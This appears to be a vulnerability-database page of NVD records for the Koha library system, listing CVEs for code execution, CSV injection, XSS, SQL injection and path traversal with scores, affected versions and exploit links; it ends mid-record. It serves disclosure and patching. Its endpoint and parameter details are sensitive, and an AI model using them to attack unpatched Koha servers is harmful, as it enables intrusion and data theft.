Vulnerabilities related to Koha - Koha
Vulnerability from fkie_nvd
Published
2024-08-06 19:15
Modified
2024-08-12 18:18
Summary
An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter.
Impacted products
Vendor Product Version
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "805198C0-742F-4F3E-90F3-C6C290795A5E",
              "versionEndIncluding": "23.05.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter."
    },
    {
      "lang": "es",
      "value": "Un problema en Koha ILS 23.05 y anteriores permite a un atacante remoto ejecutar c\u00f3digo arbitrario a trav\u00e9s de un script manipulado en el par\u00e1metro de formato."
    }
  ],
  "id": "CVE-2024-28739",
  "lastModified": "2024-08-12T18:18:17.717",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.6,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 6.0,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-08-06T19:15:56.287",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2024-02-12 22:15
Modified
2025-09-29 15:16
Summary
CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.
Impacted products
Vendor Product Version
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5079FA23-5E5B-4D7C-BC8B-ECF0E7BB8069",
              "versionEndIncluding": "23.05.05",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "CSV Injection vulnerability in \u0027/members/moremember.pl\u0027 and \u0027/admin/aqbudgets.pl\u0027 endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the \u0027Budget\u0027 and \u0027Patrons Member\u0027 components."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de inyecci\u00f3n CSV en los endpoints \u0027/members/moremember.pl\u0027 y \u0027/admin/aqbudgets.pl\u0027 en Koha Library Management System versi\u00f3n 23.05.05 y anteriores permite a los atacantes inyectar comandos DDE en exportaciones csv a trav\u00e9s de los componentes \u0027Budget\u0027 y \u0027Patrons Member\u0027."
    }
  ],
  "id": "CVE-2024-24337",
  "lastModified": "2025-09-29T15:16:05.927",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.0,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.1,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-02-12T22:15:08.430",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://nitipoom-jaroonchaipipat.github.io/security-research-portal/2024-24337"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1236"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1236"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2024-08-06 19:15
Modified
2024-08-21 18:35
Summary
Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component.
Impacted products
Vendor Product Version
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "805198C0-742F-4F3E-90F3-C6C290795A5E",
              "versionEndIncluding": "23.05.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de Cross-Site Scripting en Koha ILS 23.05 y anteriores permite a un atacante remoto ejecutar c\u00f3digo arbitrario a trav\u00e9s del componente additonal-contents.pl."
    }
  ],
  "id": "CVE-2024-28740",
  "lastModified": "2024-08-21T18:35:02.877",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.6,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-08-06T19:15:56.380",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://febin0x4e4a.wordpress.com/2023/01/11/xss-vulnerability-in-koha-integrated-library-system/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Summary
Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface.
References
cve@mitre.org https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 Exploit, Issue Tracking
cve@mitre.org https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 Exploit, Issue Tracking, Third Party Advisory
cve@mitre.org https://koha-community.org/koha-3-14-16-released/ Release Notes
cve@mitre.org https://koha-community.org/security-release-koha-3-16-12/ Release Notes
cve@mitre.org https://koha-community.org/security-release-koha-3-18-8/ Release Notes
cve@mitre.org https://koha-community.org/security-release-koha-3-20-1/ Release Notes
cve@mitre.org https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html Exploit, Third Party Advisory, VDB Entry
cve@mitre.org https://seclists.org/fulldisclosure/2015/Jun/80 Exploit, Mailing List, Third Party Advisory
cve@mitre.org https://www.exploit-db.com/exploits/37387/ Exploit, Third Party Advisory, VDB Entry
cve@mitre.org https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ Exploit, Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 Exploit, Issue Tracking
af854a3a-2127-422b-91ae-364da2661108 https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 Exploit, Issue Tracking, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 https://koha-community.org/koha-3-14-16-released/ Release Notes
af854a3a-2127-422b-91ae-364da2661108 https://koha-community.org/security-release-koha-3-16-12/ Release Notes
af854a3a-2127-422b-91ae-364da2661108 https://koha-community.org/security-release-koha-3-18-8/ Release Notes
af854a3a-2127-422b-91ae-364da2661108 https://koha-community.org/security-release-koha-3-20-1/ Release Notes
af854a3a-2127-422b-91ae-364da2661108 https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 https://seclists.org/fulldisclosure/2015/Jun/80 Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 https://www.exploit-db.com/exploits/37387/ Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ Exploit, Release Notes, Third Party Advisory
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
              "versionEndExcluding": "3.14.16",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
              "versionEndExcluding": "3.16.12",
              "versionStartIncluding": "3.16.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6E51D4D-9FD8-44A8-8FB0-4880927429D1",
              "versionEndExcluding": "3.18.08",
              "versionStartIncluding": "3.18.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EBE685F-DE28-42F4-A071-0A14DE61D0C0",
              "versionEndExcluding": "3.20.01",
              "versionStartIncluding": "3.20.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de inyecci\u00f3n SQL en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten (1) que atacantes remotos ejecuten comandos SQL arbitrarios mediante el par\u00e1metro number en opac-tags_subject.pl en la interfaz OPAC o (2) que usuarios autenticados remotos ejecuten comandos SQL arbitrarios mediante los par\u00e1metros Filter o (3) Criteria en reports/borrowers_out.pl en la interfaz Staff."
    }
  ],
  "id": "CVE-2015-4633",
  "lastModified": "2024-11-21T02:31:26.750",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-10-18T21:29:01.800",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37387/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37387/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Summary
The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors.
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
              "versionEndExcluding": "3.08.23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
              "versionEndExcluding": "3.10.13",
              "versionStartIncluding": "3.10.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
              "versionEndExcluding": "3.12.10",
              "versionStartIncluding": "3.12.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
              "versionEndExcluding": "3.14.03",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors."
    },
    {
      "lang": "es",
      "value": "La funci\u00f3n MARC framework import/export (archivo admin/import_export_framework.pl) en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10 y versiones 3.14.x anteriores a 3.14.3, no requiere autenticaci\u00f3n, lo que permite a atacantes remotos llevar a cabo ataques de inyecci\u00f3n SQL por medio de vectores no especificados."
    }
  ],
  "id": "CVE-2014-1924",
  "lastModified": "2024-11-21T02:05:17.070",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-01-24T17:15:12.327",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Summary
Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors.
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
              "versionEndExcluding": "3.08.23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
              "versionEndExcluding": "3.10.13",
              "versionStartIncluding": "3.10.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
              "versionEndExcluding": "3.12.10",
              "versionStartIncluding": "3.12.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
              "versionEndExcluding": "3.14.03",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de salto de ruta en el archivo tools/pdfViewer.pl en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10 y versiones 3.14.x anteriores a 3.14.3, permite a atacantes remotos leer archivos arbitrarios por medio de vectores no especificados"
    }
  ],
  "id": "CVE-2014-1922",
  "lastModified": "2024-11-21T02:05:16.780",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
